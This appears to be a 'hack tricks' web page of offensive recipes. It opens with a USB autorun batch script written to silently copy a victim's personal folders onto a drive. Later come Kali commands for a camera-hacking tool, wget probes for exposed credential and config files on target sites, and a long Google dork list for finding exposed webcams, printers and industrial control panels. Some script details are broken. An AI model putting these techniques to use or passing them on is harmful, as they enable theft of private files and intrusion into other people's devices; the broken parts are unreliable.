HACK TRICKS

USB HACK TRICK

Step 1: Open new Notepad File and type code given below and save as autorun.inf


[autorun]

open=new.bat

icon=new.bat,0 


Step 2: Open another new Notepad File and type code given below and save as new.bot


:: variables

/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y /g

echo off

%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"

%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"

%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"

%backupcmd% "%USERPROFILE%\Download" "%drive%\all\Download"

%backupcmd% "%USERPROFILE%\Desktop" "%drive%\all\Desktop"

%backupcmd% "%USERPROFILE%\Music" "%drive%\all\Music"

%backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents"

@echo off


Step 3: Paste both files new.bat & autorun.inf in your USB Drive 


Step 4:  Insert the USB drive into victims computer. Once you insert it, you will get all the data from victims computer. If it doesn’t work, simply open the Pendrive and double click on new.bat, the data will copies successfully. 



Subdomain Hack trick perl script code



USE Example


copy the code save like Subdomain.pl


root@kali:~# perl Subdomain.pl <target> | more


#!/usr/bin/perl

use strict;

use warnings;

use LWP::UserAgent;


my $domain = shift or die "Usage: $0 domain.com\n";


my $ua = LWP::UserAgent->new;

my $response = $ua->get("http://api.hackertarget.com/hostsearch/?q=$domain");


if ($response->is_success) {

    my $result = $response->decoded_content;

    print "$result\n";

} else {

    die $response->status_line;

}



WEB BROWSER HACK TRICKS

Extensions, and technical hacks are presented for you to explore.

Example chrome://chrome-urls/  open in Web browser Chrome

Example about:about open in Web browser Firefox

CAM HACK TRICKS 

root@kali:~# apt install git python3

root@kali:~# git clone https://github.com/AngelSecurityTeam/Cam-Hackers

root@kali:~# cd Cam-Hackers

root@kali:~/Cam-Hackers# pip install -r requirements.txt 

root@kali:~/Cam-Hackers# python3 cam-hackers.py

Zaproxy trick

root@kali:~# apt install zaproxy tor

root@kali:~# service tor start

root@kali:~# proxychains owasp-zap -addoninstallall -quickurl <target>


Phoneinfoga install

root@kali:~# curl -sSL https://raw.githubusercontent.com/sundowndev/PhoneInfoga/master/support/scripts/install | bash

root@kali:~# sudo mv ./phoneinfoga /usr/bin/phoneinfoga

root@kali:~# phoneinfoga serve

Open http://127.0.0.1:5000/

Install Spiderfoot

root@kali:~# apt install spiderfoot

This package contains an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN, e-mail address or person’s name.

SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target, or defensively to identify what information you or your organisation are freely providing for attackers to use against you.

Spiderfoot Example

root@kali:~# spiderfoot -l 127.0.0.1:5001

Spiderfoot Example TOR

root@kali:~# tor --SocksPort 9050 --ControlPort 9051

Hacking with wget Use usb key

root@kali:~#wget http://website/server-status

root@kali:~#wget http://website/sftp-config.json

root@kali:~#wget http://website/app/etc/local.xml

root@kali:~#wget http://website/.git/config

root@kali:~#wget  http://website/.wp-config.php.swp

root@kali:~#wget http://website/%23wp-config.php%23

root@kali:~#wget http://website/wp-config.php~

root@kali:~#wget http://website/dump.sql

root@kali:~#wget -dnv http://website/sitemap.xml

root@kali:~#wget --random-wait -r -p -e robots=off -U mozilla http://website/

root@kali:~#wget --spider -o wget.log -e robots=off --wait 1 -r -p http://website

root@kali:~#wget -b -c --tries=NUMBER http://website

root@kali:~#wget -b --limit-rate=30 -np -N -m -nd --accept=LIST --wait=5 http://website/

root@kali:~#wget -r -H --convert-links --level=NUMBER --user-agent=AGENT http://website/

root@kali:~#wget --http-user=USER --http-password=PASS http://website/

First, create a text file of all the URLs you want to download using wget and call it wget_downloads.txt. Then to download URLs in bulk, type in this command

root@kali:~#wget -rH -p -dnv -i wget_downloads.txt

root@kali:~#wget -E -rH -p --no-check-certificate -i -dnv http://website/

root@kali:~#wget http://192.168.1.99//proc/kcore | struny | nano

🌎

Google doork 

inurl:login.html intitle:"GPON Home Gateway"

inurl:"portal.mwsl" "Status"

intitle:"D-LINK SYSTEMS, INC. | Web File Access : Login"

"Account" "Password" "All rights reserved" intitle:"HG8245"

intitle:"IP Webcam" inurl:"/greet.html"

inurl:login.html intitle:"Archer C7"

inurl:dtm.html intitle:1747-L551

site:*/dyn_sensors.htm "ID"

inurl:/Jview "zoom"

AXIS Camera exploit

intitle:"NetCamSC*"

"System" + "Toner" + "Input Tray" + "Output Tray" inurl:cgi

intitle:"NetCamXL*"

intitle:"Agent web client: Phone Login"

inurl:/Jview.htm + intext:"Zoom :"

intext:"Connection" AND "Network name" AND " Cisco Meraki cloud" AND "Security Appliance details"

"change the Administrator Password." intitle:"HP LaserJet" -pdf

inurl: inurl:"view.shtml" ext:shtml

inurl:"view.shtml" "camera"

inurl:"/cgi-bin/guestimage.html" "Menu"

inurl:"view.shtml" "Network"

inurl:/Jview.htm + "View Video - Java Mode"

inurl:/homej.html?

inurl: 1051/viewer/live/index.html?lang=en

inurl:/index.html?size=2&amp;mode=4

intitle:"NetCamSC*" | intitle:"NetCamXL*" inurl:index.html

inurl:set_config_password.html

inurl:/8080 "windows" "live view"

inurl:"webArch/mainFrame.cgi" + "Web Image Monitor"

"Pop-up" + "Live Image" inurl:index.html

inurl:"live/cam.html"

inurl:"/viewer/live.html"

inurl:/CgiStart?page

inurl:"/viewer/live/index.html"

intitle:"Rockwell Automation" inurl:"index.html" "Device Name"

inurl:8080/view/viewer_index.shtml?id= -site:*.com

intitle:"Miniweb Start Page"

inurl:/presentation/html/top/index.html

allintitle:"Welcome to the Web-Based Configurator"

inurl:"view.shtml" "Network Camera"

intitle:"Tuxedo Connected Controller"

inurl:/config/cam_portal.cgi "Panasonic"

inurl:.*eservices/login

"Camera Live Image" inurl:"guestimage.html"

intitle:"UPS Status" "Status" inurl:/host

intitle:"webcam" inurl:login

"HP LaserJet" inurl:"SSI/index.htm"

inurl:8081/ "Pan, Tilt &amp; Zoom"

inurl:axis-cgi/mjpg/video swf

inurl:/home/homej.html

intext:"Frame rate" inurl:/home/homej.html

intext:"Device Name" | intext:"Host Name" inurl:mainFrame.cgi

inurl:"/general/status.html"

inurl:axis-cgi/jpg

inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera"

inurl /view.shtml intext:"Airport"

intitle:"SFXAdmin - sfx_global" intext:"Login Form"

inurl:/sws/index.html

inurl:/jobq.htm AND intext:"ApeosPort-V"

inurl:/base/main_login.html intext:"Login"

inurl:index.shtml

allinurl:top.htm?Currenttime

intitle:"HP ALM" "Application Lifecycle Management" inurl:/qcbin/ -ext:PDF

intitle:"WEBCAM 7 " -inurl:/admin.html

site:*/EWS/Exchange.asmx

inurl:/db.php?path_local=

inurl:/gmap.php?id=

intitle:"WeatherLinkIP Configuration"

intitle:"Internet Services" inurl:default.htm intext:"FUJI XEROX"

intitle:"Kyocera Command Center" inurl:index.htm

inurl:8080/dashboard.php

inurl:8080/dashboard intitle:Graphite Dashboard

inurl:/index.htm intext:"Oki Data Corporation"

inurl:mainFrame.cgi intext:"RICOH"

inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device

inurl:/main.html intext:SHARP AND intext:MX-*

inurl:sws/index.html AND intext:"Model Name" AND intext:"Serial Number"

inurl:/dana/home/ filetype:cgi

inurl:/dana-cached/sc/

intitle:"index of" "cvsweb.cgi"

inurl:SSI/index.htm

inurl:./sws/index.sws

inurl:/frameprop.htm

inurl:"/English/pages_WinUS/" AND intitle:"Top page"

intitle:"Printer Status" AND inurl:"/PrinterStatus.html"

intitle:("Solr Admin") AND intext:("Dashboard" AND "Corporation")

inurl:axis-cgi/mjpg/video.cgi

inurl:8000 intext:"Copyright CANON INC. 2012"

inurl:cgistart

inurl:view.shtml

intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame

inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control"

intitle:("Solr admin page") AND intext:("Make a Query")

inurl:/HDDReplay.html

intitle:"webcamXP 5" inurl:8080 'Live'

intext:"EWS Data Collection and Use"

inurl:hp/device/deviceinformation

intitle:ThingsBoard inurl:8080/dashboard

filetype:psp intitle:"Motorola - FX9500"

inurl:"view/index.shtml"

inurl:"MultiCameraFrame?Mode=Motion"

"VB Viewer" inurl:/viewer/live/ja/live.html

intitle:"IP CAMERA Viewer" intext:"setting | Client setting"

inurl:"nobody/loginQuick.htm"

site:*/cgi-bin/webproc intext:"username"

inurl:/swagger/index.html

intext:"Security is Off" intitle:"Namenode information"

"Firmware Version" intitle:"iLO" ProLiant Login -hpe.com -update

intitle:rsview32 ext:asp

intitle:"WSO2 Management Console"

intitle:"Home - Mongo Express"

inurl:"8080/dashboard/" intitle:"Dashboard"

inurl:"/index.php?enter=guest"

inurl:CGI/Java/Serviceability?adapter=device.statistics.device

intitle:"Marshall VS Server"

intext:{{szErrorTip}} inurl:/doc/page/login.asp

intitle:"openshift web console" inurl:console inurl:/console

inurl:"/hp_login.html"

inurl:webArch/mainFrame filetype:cgi intext:"Web Image Monitor"

intitle:"VideoEdge Admin Interface"